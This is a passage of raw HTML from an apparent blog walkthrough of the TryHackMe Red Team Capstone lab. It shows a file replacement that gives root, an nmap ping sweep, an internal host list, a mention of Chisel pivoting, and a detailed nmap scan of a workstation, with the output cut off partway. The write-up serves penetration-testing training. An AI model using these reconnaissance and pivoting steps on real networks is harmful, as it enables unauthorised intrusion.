sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The final step is to copy the file back to its original place.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910fd5a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910fd5a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"223\" data-attachment-id=\"483\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206151253\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?fit=1235%2C269&amp;ssl=1\" data-orig-size=\"1235,269\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206151253\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?fit=1024%2C223&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?resize=1024%2C223&#038;ssl=1\" alt=\"\" class=\"wp-image-483\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?resize=1024%2C223&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?resize=300%2C65&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?resize=768%2C167&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?w=1235&amp;ssl=1 1235w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We were able to replace the file and switch to our newly created user. We can also see that we have root privileges on the machine now.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"24-ping-sweep-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Ping Sweep<\/mark><\/h5>\n\n\n\n<p>We have NMAP already installed on the VPN machine. 
Since this machine can talk to the Internal network, we can quickly run a ping sweep and find all the active hosts on the network.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki 
material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">root@ip-10-200-113-12:~#<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-sn<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.200<\/span><span style=\"color: #C3E88D\">.113.0\/24<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:7px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We found the IP addresses for the hosts.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.11<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Webmail<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VPN<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.13<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WEB<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.21<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.22<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK2<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.32<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.51<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.52<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#FFCB6B\">10.200.113.61<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.100<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.101<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.102<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CORPDC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.201<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:7px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>If we recall, we found the .21 and .22 hosts from the OpenVPN connection for <code>mohammad.ahmed<\/code>. We can also see that we have more hosts active on our network map. We will start enumerating them but first, we need to set up pivoting.<\/p>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09110918&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09110918\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"553\" data-attachment-id=\"487\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206151756-1\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?fit=1357%2C733&amp;ssl=1\" data-orig-size=\"1357,733\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206151756-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?fit=1024%2C553&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?resize=1024%2C553&#038;ssl=1\" alt=\"\" class=\"wp-image-487\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?resize=1024%2C553&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?resize=300%2C162&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?resize=768%2C415&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?w=1357&amp;ssl=1 1357w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"25-pivoting-setup-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Pivoting Setup<\/mark><\/h4>\n\n\n\n<p>We will use <code>Chisel<\/code> to set up pivoting. Our Kali (attack) machine will serve as the server and the VPN machine will act as the client. 
We should be able to interact with the machines in the internal network directly from our machine after setting up pivoting.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>On our Machine:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"146\" data-attachment-id=\"488\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206160339\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?fit=1557%2C222&amp;ssl=1\" data-orig-size=\"1557,222\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206160339\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?fit=1024%2C146&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=1024%2C146&#038;ssl=1\" alt=\"\" class=\"wp-image-488\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=1024%2C146&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=300%2C43&amp;ssl=1 300w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=768%2C110&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=1536%2C219&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?w=1557&amp;ssl=1 1557w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>On VPN Machine:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"96\" data-attachment-id=\"489\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206160352\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?fit=1320%2C124&amp;ssl=1\" data-orig-size=\"1320,124\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206160352\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?fit=1024%2C96&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?resize=1024%2C96&#038;ssl=1\" alt=\"\" class=\"wp-image-489\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?resize=1024%2C96&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?resize=300%2C28&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?resize=768%2C72&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?w=1320&amp;ssl=1 1320w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"26-breaching-the-perimeter-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Breaching the Perimeter<\/mark><\/h2>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"27-wrk1-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">WRK1 Machine<\/mark><\/h3>\n\n\n\n<p>We will begin by running an NMAP scan to find the open ports and services.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"28-nmap-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h4>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 
0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/WRK1<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p22,135,139,445,3389<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1.corp.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-oN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">nmap\/wrk1-fullscan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-Pn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-02-06 12:12 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1.corp.thereserve.loc<\/span><span style=\"color: #BABED8\"> (10.200.113.21)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.52s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  
<\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for_Windows_7.7<\/span><span style=\"color: #BABED8\"> (protocol <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">2048<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">21<\/span><span style=\"color: #C3E88D\">:78:e2:79:d3:93:ee:f9:aa:70:94:ec:01:b3:a5:8f<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">e0:f7:b6:67:c9:93:b5:74:0f:0a:83:ff:ef:55:c8:9a<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">bd:83:0c:e3:b4:4f:78:f2:e3:4a:52:03:3c:a5:ce:58<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">135\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span 
style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">139\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">445\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">microsoft-ds?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3389\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ms-wbt-server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Terminal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Services<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_ssl-date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T18:13:47+00:00<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">-1s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">from<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">scanner<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">time.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssl-cert:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commonName=WRK1.corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">before:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-04T20:26:11<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">after:<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-08-05T20:26:11<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">rdp-ntlm-info:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Target_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CORP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Domain_Name:<\/span><span style=\"color: 
#BABED8\"> <\/span><span style=\"color: #C3E88D\">CORP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Computer_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Domain_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Computer_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1.corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: 